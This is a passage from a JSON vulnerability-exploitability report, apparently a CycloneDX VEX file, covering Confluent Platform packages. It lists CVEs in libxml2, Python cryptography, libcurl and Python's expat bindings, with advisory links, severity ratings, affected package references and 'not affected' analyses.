          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461300"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1097"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6732"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8460-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6732"
        }
      ],
      "published": "2026-04-23T23:16:16+00:00",
      "updated": "2026-06-30T20:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-69247",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        208,
        209
      ],
      "description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 44.0.0 until 50.0.0, pkcs7_decrypt_der, pkcs7_decrypt_pem, and pkcs7_decrypt_smime reported the outcome of decrypting a RecipientInfo's encryptedKey in several distinguishable ways, one of which disclosed the exact length recovered from the RSA operation. The same distinction was also observable by timing. An application that decrypts attacker-supplied EnvelopedData and reflects the outcome gives the attacker a Bleichenbacher oracle against the content-encryption key. Decryption ran as RSA PKCS#1 v1.5 decrypt of encryptedKey, build an AES cipher from the result, then AES-CBC decrypt and PKCS#7 unpad. Invalid RSA padding, a valid padding with a bad key length, a correct length with a wrong key, and the real key each failed or succeeded differently. Case 1 is reachable only where the linked library lacks implicit rejection: OpenSSL 3.0 and 3.1, LibreSSL, and BoringSSL. Exploitation requires a service that auto-decrypts untrusted EnvelopedData matching the victim certificate and answers adaptively at high volume, such as an S/MIME gateway or mail filter. This issue is fixed in 50.0.0.",
      "recommendation": "Upgrade cryptography to version 50.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69247"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/53fccd93413a8d7f07d6d8999681f27b75cffa3f"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/15369"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-g6cj-pr64-35w5"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T15:16:43+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69248",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        295
      ],
      "description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 49.0.0, if an intermediate constrained CA permits the DNS name foo.example.com, and the leaf certificate has a wildcard in its DNS SAN of *.example.com, python-cryptography's verifier accepts which allows escaping outside of the permitted names. The core issue is in DNSConstraint::matches, where a wildcard pattern was treated as matching a more-specific permitted constraint even though *.example.com can expand to sibling names such as bar.example.com outside foo.example.com. This allows acceptance of an invalid certificate chain. This issue is fixed in 49.0.0.",
      "recommendation": "Upgrade cryptography to version 49.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69248"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/4d035a4225965edeffd312079a510ef25fcfdcb2"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/14888"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-m2h6-j472-rp4c"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T16:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69249",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        400
      ],
      "description": "python-cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 49.0.0, when resolving invalid certificate chains that include duplicate copies of self-signed certificates, the processing recursively invokes the same candidate, leading to an exponential blowup. Although the limitation that the chain depth cannot exceed a specified maximum depth prevents unbounded recursion and guarantees termination, an attacker-controlled certificate chain can lead the processing to easily take more than 5s to reject in testing. This amplification could form the basis for a resource exhaustion denial of service attack. The core issue arises in the recursive nature of build_chain_inner, which does not de-duplicate against previously analyzed candidates. As the correctness of validation is not affected, the integrity of a system cannot be compromised through this vector, only its availability. This issue is fixed in 49.0.0.",
      "recommendation": "Upgrade cryptography to version 49.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69249"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/4a12cf49675a184e47f912b00b04f3a629283582"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/14960"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-jwv3-5hgf-82ww"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T15:16:43+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-7168",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        294
      ],
      "description": "Successfully using libcurl to do a transfer over a specific HTTP proxy\n(`proxyA`) with **Digest** authentication and then changing the proxy host to\na second one (`proxyB`) for a second transfer, reusing the same handle, makes\nlibcurl wrongly pass on the `Proxy-Authorization:` header field meant for\n`proxyA`, to `proxyB`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7168"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/14"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7168"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-7168.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-7168.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-v92m-hrhj-gw54"
        },
        {
          "url": "https://hackerone.com/reports/3697719"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7168"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7168"
        }
      ],
      "published": "2026-05-13T13:01:57+00:00",
      "updated": "2026-06-17T11:01:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-7210",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "`xml.parsers.expat` and `xml.etree.ElementTree` use insufficient entropy for Expat hash-flooding protection, which allows a crafted XML document to trigger hash flooding.\\r\\n\\r\\nFully mitigating this vulnerability requires both updating libexpat to 2.8.0 or later and applying this patch.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7210"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/11/13"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/11/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7210"
        },
        {
          "url": "https://github.com/python/cpython/commit/24b8f12544468e4cedf5bfbe25442fcd495391e4"
        },
        {
          "url": "https://github.com/python/cpython/commit/3573b3b1ecbd99030a0b18658e1bfece771b2566"
        },
        {
          "url": "https://github.com/python/cpython/commit/cbaecf9f16da611a646d507c1cbca265c588fc56"
        },
        {
          "url": "https://github.com/python/cpython/commit/e37df2a6a71d6538698e2d3188a7c345b827640b"
        },
        {
          "url": "https://github.com/python/cpython/commit/ea70712d1a8508e14e9677d44f838dab04dc0286"
        },
        {
          "url": "https://github.com/python/cpython/commit/eeea765cb9d8f1fc3d8918b272ac3c477983f27a"
        },
        {
          "url": "https://github.com/python/cpython/commit/fc9b11ff49cbc82e6f917d07a61517a2b5f3145f"
        },
        {
          "url": "https://github.com/python/cpython/issues/149018"
        },
        {
          "url": "https://github.com/python/cpython/pull/149023"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/PNY5OMBDPM2FRUZTWFFPJ6LISWKV627K/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7210"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7210"
        }
      ],
      "published": "2026-05-11T18:16:42+00:00",
      "updated": "2026-08-14T01:19:08+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
